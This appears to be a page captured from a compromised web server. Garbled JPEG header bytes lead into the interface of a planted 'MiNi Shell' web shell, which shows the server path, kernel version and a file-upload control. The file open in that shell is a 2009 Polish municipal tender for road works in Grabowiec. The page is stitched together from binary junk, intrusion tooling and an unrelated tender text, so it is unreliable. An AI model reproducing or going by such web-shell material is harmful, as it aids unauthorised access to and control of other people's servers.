JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/86302-N-2009.html

<p class="kh_header"><b>Grabowiec: Modernizacja ulicy Koziej w Grabowcu wraz z przebudową przepustu, drogi gminnej nr 110279L w miejscowości Grabowiec, drogi gminnej nr 110279L w miejscowości Siedlisko oraz drogi gminnej w miejscowości Hołużne</b><br>
<b>Numer ogłoszenia: 86302 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grabowiec , Rynek 3, 22-425 Grabowiec, woj. lubelskie, tel. 0-85 6512466, faks 0-85 6512466.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ulicy Koziej w Grabowcu wraz z przebudową przepustu, drogi gminnej nr 110279L w miejscowości Grabowiec, drogi gminnej nr 110279L w miejscowości Siedlisko oraz drogi gminnej w miejscowości Hołużne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakres prac wchodzi:
A.	Ulica Kozia:
Roboty przygotowawcze:
-Roboty remontowe - cięcie piłą nawierzchni bitumicznych na gł. do 4 cm
-Rozebranie nawierzchni z mas mineralno - bitumicznych gr. 4 cm. 
-Mechanicznie rozebranie przepustów rurowych - rury betonowe o śr. 100 cm
Roboty ziemne:
-Roboty ziemne wykonane koparkami podsiębiernymi o poj. Łyżki 0,40m3 w gr. Kat. III-IV z transportem urobku na odl. Do 1 km samochodem samowyładowczym
Budowa przepustu:
-Przepusty rurowe pod zjazdami - ławy fundamentowe tłuczniowa gr. 40 cm po zagęszczeniu
-Części przelotowe prefabrykowanych przepustów drogowych rurowych jednootworowych z rur o śr  100 cm - kręgi Zamawiającego
-Odbudowy wlotów(wylotów) prefabrykowanych przepustów drogowych rurowych beton  B-25
-Zasypywanie wykopów ze skarpami piaskiem wraz z zagęszczeniem
-Warstwa dolna podbudowy z kruszyw łamanych gr.25 cm
Roboty nawierzchniowe:
-Oczyszczenie mechaniczne nawierzchni drogowych bitumicznych
-Wyrównanie istniejącej podbudowy mieszanką mineralną-bitumiczną asfaltową mechaniczne
-Skropienie emulsją asfaltową w ilości 0,5kg/m2 nawierzchni drogowych
-Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa ścieralna)
B.	Droga gminna nr 110279L w Grabowcu od km 0+000 do km 0+277,00
Roboty ziemne:
-Wykop pod rowy odpływowe od przepustu w gruncie kat. III -IV z transportem          z urobku i wbudowaniem gruntu w pobocza
-Wykonanie wykopów pod przepusty w gruncie kat. III-IV z wbudowaniem gruntu    w pobocza
-Zasypywanie wnęk za ściankami budowli inżynierskich
-Ścinanie gruntu rodzimego z istniejącej nawierzchni grubości do 10 cm                      z wbudowaniem gruntu w pobocza 110x0x5,2
Obiekty:
-Wykonanie ścianek czołowych przepustów drogowych jednootworowych 1,4x2
Roboty nawierzchniowe:
-Mechaniczne oczyszczanie
-Skropienie istniejącej nawierzchni emulsją asfaltową
-Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną
-Wykonanie nawierzchni z betonu asfaltowego standard I, grubość warstwy 4 cm - warstwa ścieralna
Plantowanie skarp:
-Plantowanie (obrobienie na czysto) skarp i korony nasypów wykonanych ręcznie, grunt kat. I-III 120x(0,75+0,5)x2+130x0,4x2
Umocnienie skarp:
-Obsianie poboczy trawą

C. Droga gminna nr 110279L w Siedlisku od km 0+597,00 do km 0+680,00:
 Roboty nawierzchniowe:
-Mechaniczne oczyszczenie
-Skropienie istniejącej nawierzchni emulsją asfaltową
-Wykonanie nawierzchni z betonu asfaltowego standard I, grubość warstwy 5 cm - warstwa ścieralna
Plantowanie skarp:
-Plantowanie (obrobienie na czysto) skarp i korony nasypów wykonanych ręcznie, grunt kat. I-III z uzupełnieniem brakującego gruntu średniej grub. 5 cm
Umocnienie skarp:
-Obsianie poboczy trawą
C.	Droga gminna w miejscowości Hołużno
-Mechaniczne ścięcie poboczy przy użyciu równiarkami samojezdnymi w gruncie kat. III i IV ((235+20)x5)x2
-Mechaniczne oczyszczenie podbudowy z zanieczyszczeń (235+20)x4,5
-Wyrównanie istniejącej podbudowy betonowej tłuczniem z mechanicznym zagęszczeniem warstwą gr. 6 cm (100x4,5x0,06)
-Remont istniejącej nawierzchni asfaltowej asfaltobetonem - standard II
-Mechaniczne skropienie podbudowy emulsją asfaltową w ilości 0,5 kg/m2 (235+20)x4,5
-Wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej grubości 4 cm - standard II (235+20)x0,5)x2
-Mechaniczne profilowanie poboczy równiarką ((235+20)x0,5)x2
Szczegółowy zakres robót zawierają załączone kosztorysy ofertowe - załączniki nr 2, 3, 4, 5.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki okre-ślone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, to jest:
1)	posiadają uprawnienia do wykonywania robót będących przedmiotem zamówienia;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicz-nym i osobami zdolnymi do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamó-wienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Z postępowania o udzielenie zamówienia wyklucza się wykonawców na podst. art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
3.	Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu określone w art.22 ust 1 ustawy P. z .p., jeżeli Wykonawca złoży:
1)	oświadczenie, że spełnia wymogi określone przez art. 22 ust. 1 ustawy Prawo zamó-wień publicznych,
2)	dokumenty i oświadczenia określone w pkt XI niniejszej SIWZ.
4.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawar-cia umowy w sprawie zamówienia publicznego. W przypadku wspólnego ubiegania się o udzielenie zamówienia, przepisy i wymogi dotyczące wykonawcy stosuje się również do wykonawców występujących wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy.
2) 	Oferta winna być podpisana przez każdego partnera lub ustanowionego pełnomocnika,
3) 	Oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w pkt XI.1.ppkt 1,2,4,7 SIWZ dla każdego partnera z osobna, pozostałe składane są wspólnie, z zastrzeżeniem pkt XI.3 niniejszej SIWZ. 
4)	Warunek wysokości polisy musi być spełniony przez każdego partnera indywidualnie - pkt XI.1. ppkt 6. określone w art. 22 ust. 1 ustawy P.z.p.
5.	Wykonawca zobowiązany jest wskazać, które części zamówienia zamierza powierzyć podwykonawcom oraz podać ich zakres, nazwę firmy i adres..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wykonawca składa w postępowaniu następujące dokumenty i oświadczenia:
1)	aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewi-dencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Spo-łecznego, potwierdzających odpowiednio, że Wykonawca nie zalega z uiszczaniem po-datków, opłat i składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zale-głych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wy-stawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3)	dokument stwierdzający, że osoby, które będą wykonywać zamówienie, posiadają wy-magane uprawnienia (m.in. uprawnienia zawodowe osoby, która będzie pełniła funkcję kierownika budowy oraz aktualne zaświadczenie, że osoba ta jest członkiem właściwej izby zawodowej),
4)	wykaz minimum 3 wykonanych w ciągu ostatnich pięciu lat robót budowlanych, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie (referencje) - załącznik nr 8 do siwz;
5)	wykaz osób i podmiotów, które wykonywać będą zamówienie lub będą uczestniczyć  
w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji, niezbędnych do wykonania zamówienia - załącznik nr 7do siwz;
6)	polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpie-czony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodar-czej na kwotę min 100 000 złotych;
7)	oświadczenie zgodnie z art. 22 ust. 1 oraz art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655), złożone zgodnie ze wzorem określonym w załączniku nr 9 do siwz.
2.	W przypadku składania oferty przez podmioty występujące wspólnie dodatkowo wraz z ofertą:
1)	Winna być przedłożona kopia umowy, porozumienie lub inny dokument regulujący współpracę podmiotów występujących wspólnie, podpisany przez wszystkich partne-rów, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realiza-cji zamówienia;
2)	wykonawca składa pełnomocnictwo/upoważnienie do pełnienia funkcji pełnomocnika, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z partnerów.
3.	Dokumenty należy składać w formie oryginału lub kserokopii poświadczonej za zgod-ność z oryginałem przez wykonawcę.
4.	Dokumenty sporządzane w języku obcym są składane wraz z tłumaczeniem na język pol-ski, poświadczonym przez wykonawcę.
5.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zastosowa-nie znajduje § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w spra-wie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.grabowiec.pl/bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.grabowiec.pl/bip.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 13:00, miejsce: Urząd Gminy Grabowiec, ul. Rynek 3, 22-425 Grabowiec.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com